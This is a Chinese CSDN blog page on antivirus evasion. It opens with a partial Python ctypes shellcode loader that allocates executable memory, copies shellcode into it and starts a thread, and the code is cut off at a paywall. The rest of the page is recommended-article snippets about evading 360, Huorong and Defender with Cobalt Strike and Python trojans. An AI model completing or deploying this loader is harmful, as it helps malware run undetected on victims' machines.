免杀专题(二)loader编写以python为例

最新推荐文章于 2023-11-21 12:00:42 发布
最新推荐文章于 2023-11-21 12:00:42 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: python 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/122227817
版权

免杀专题(二)loader编写以python为例

先贴代码

import ctypes

#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 
                                              ctypes.c_int(len(shellcode)), 												  ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    
    
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),
                                     		  buf,
                                              ctypes.c_int(len(shellcode)))
    
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0)
最低0.47元/天 解锁文章
hedianshui888
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python之_Python之__loader__
weixin_39574869的博客
11-26 320
What is __loader__?__loader__是由加载器在导入的模块上设置的属性,访问它时将会返回加载器对象本身。在Python版本3.3之前,__loader__在内置的导入机制中没有被设置(没有这个属性)。 相反,该属性只适用于使用自定义加载器导入的模块。What is loader?loader是由finder查找器返回的一个对象,它使用的它的load_module()方法来一个...
python使用win32库模拟拖拽文件发给指定窗口
kaiixing的专栏
12-22 3066
最近要用python模拟人的操作给窗口发送拖拽文件的消息,网上搜了一大圈也没搜到现成可用的代码。幸好以前做过vc开发,熟悉点win32编程,于是装上vs和msdn,从消息WM_DROPFILES查起,慢慢得实现了这个功能。 WM_DROPFILES是向win32窗口拖拽一个文件松开鼠标左键后会触发发送给窗口的消息,前提是目标窗口是支持拖拽消息的响应,在win32中是通过窗口样式:...
Python:各种编码简单总结
问道于旁
06-23 1337
JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。它基于JavaScript(Standard ECMA-262 3rd Edition - December 1999)的一个子集。 JSON采用完全独立于语言的文本格式,但是也使用了类似于C语言家族的习惯(包括C, C++, C#, Java, JavaScript, Perl, Python等)。这些
python pytorch教程-带你从入门到实战(代码全部可运行)
热门推荐
weixin_43327597的博客
06-23 1万+
其实这个教程以前博主写过一次,不过,这回再写一次,打算内容写的多一点,由浅入神,然后加入一些实践案例。下面是我们的内容目录: 1.先从数据类型谈起2.数据类型和其操作谈完,选择某一个方向开始学习和实践(深度学习)。1.先从数据类型谈起那如果从数据类型谈起,我们就要从下面几个角度去谈:1.1 如何生成pytorch的各种数据类型?1.2 pytorch的各种数据类型有哪些属性?1.3 pytorch的各种数据类型有哪些函数操作?首先,我们知道pytorch是一个计算库,也有人说是深度学习库,那么计算库呢,肯
【红蓝对抗】Python免杀入门学习
Fighter安全
04-23 1797
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
Loader:使用OGR用Python编写的GML和KML加载程序
05-08
该加载程序最初被编写为以GML / GZ格式加载军械测量操作系统MasterMap地形图层数据,但此后已用于加载其他GML和KML数据。依存关系OGR 1.9 OGR是工具套件的一部分,该工具套件用于翻译和处理地理空间数据。 Python ...
webpack4之如何编写loader的方法步骤
10-16
**Webpack 4 编写Loader的方法步骤** Webpack 是一个模块打包工具,它允许开发者将JavaScript、CSS、图片等资源转换成浏览器可识别的格式。在Webpack的生态系统中,Loader 负责处理不同类型的模块,如将ES6语法转换...
CS-Loader:CS免杀
03-22
CS-避免杀人CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试下...
利用torch.nn实现维卷积python代码
12-11
本教程将详细讲解如何利用Python的PyTorch库中的torch.nn模块来实现一个简单的维卷积神经网络。PyTorch是一个强大的深度学习框架,它提供了丰富的API用于构建和训练神经网络。 首先,让我们从基本概念开始。维...
Python库 | tdm_loader-1.2.1-py3.6.egg
02-21
`tdm_loader`是针对Python的一个特定库,专为处理数据加载任务设计,尤其适合那些需要高效地从各种数据源获取和处理数据的项目。在版本1.2.1中,该库已经优化了性能和稳定性,以更好地服务于开发人员。 **tdm_...
基于python的简单免杀
最新发布
2301_76232299的博客
11-21 1931
本次文章只用于技术讨论,学习,切勿用于非法用途。
[编程进阶]ctypesPython编程中的奇光异彩
不忘初心,护天下安全!
08-05 1013
一、What is ctypesctypesPython 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装…… 相信你可能会觉得这又是一篇从“入门到精通”类的文章。当然不是的nei~我就是记一下我觉得有价值的东东,你一定也会用得到,而且关注我的小伙伴们自然猜到我们为什么要用ctypes,嘻嘻???? 详细的介绍可见:https://docs.python.org/zh-cn/3.7/library/ctyp
免杀】木马免杀制作
网络安全从业者的学习笔记
03-25 1667
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
python-shellcode加载器初体验
Y4tacker的博客
03-28 2081
@Author:Y4tacker 文章目录python-shellcode加载器流程函数介绍VirtualAllocRtlMoveMemoryCreateThreadWaitForSingleObject实战 python-shellcode加载器 主要是利用ctypes库来调用windows的api来完成加载shellcode的操作 流程 将shellcode加载进内存并执行 函数介绍 VirtualAlloc 申请内存调用VirtualAlloc函数,来申请一块动态内存区域。VirtualAlloc函数
木马免杀(篇)shellcode 学习
Goodric的博客
08-10 1690
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell。
python加载shellcode免杀 简介
whatday的专栏
10-02 4575
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypesPython的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
python免杀学习
m0_58595840的博客
01-06 446
python免杀bypass学习
免杀专题 (三)对loader进行远程加载
weixin_47224111的博客
12-30 1122
免杀专题 (三)对loader进行远程加载 上一篇写到的loader被各种杀软乱杀 import ctypes #shellcode加载 def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
python桌面快捷图标_如何使用python 2.7移动Windows桌面图标?
weixin_39658318的博客
11-26 586
我正在尝试编写一个python例程来保存和恢复桌面图标位置.我在Windows 7 x64上使用32python 2.7.使用此处的信息(堆栈交换),我能够从外部进程列表视图中读取Windows用于存储此信息的图标名称和位置,但是在使用LVM_SETITEMPOSITION设置新位置(或恢复位置)时失败.所有图标最终都在桌面上的相同位置. ‘自动排列’和’对齐网格’已关闭.相关代码是最底层的.警...
python 免杀
09-11
Python免杀是指在编写Python恶意代码时,通过一系列技术手段绕过杀毒软件的检测和阻止。在进行Python免杀时,可以采取多种常用的静态免杀技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值